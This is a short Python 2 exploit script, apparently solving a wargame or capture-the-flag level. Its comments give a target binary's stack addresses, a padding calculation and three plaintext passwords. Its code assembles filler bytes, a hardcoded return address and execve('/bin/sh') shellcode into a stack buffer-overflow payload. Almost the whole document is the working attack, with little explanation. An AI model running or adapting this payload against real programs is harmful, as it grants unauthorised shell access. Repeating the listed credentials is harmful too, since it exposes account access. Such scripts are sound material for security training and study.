```python
#!/usr/bin/env python

### Memory Address
# Memory Address of the Start of Door : 0xbffff7d8
# Memory Address of RIP ($eip)        : 0xbffff7ec
# Size of the Buffer Padding          : 0xbffff7ec - 0xbffff7d8 = 20 bytes
# Return Pointer                      : 0xbffff7ec + 4 = 0xbffff7f0

### Login Information
# Password: zMne62>V
# Username: smith
# Password: f6g(Bz{w

### Exploitation Script
# 20 filler bytes covering the distance from the start of the buffer to the saved RIP
padding = "\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69"
# 0xbffff7f0 in little-endian byte order
return_pointer = "\xf0\xf7\xff\xbf"
shellcode = ("\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07" +
             "\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d" +
             "\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80" +
             "\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68")
buffer = padding + return_pointer + shellcode
# Python 2 print statement: writes the raw bytes followed by a newline
print buffer
```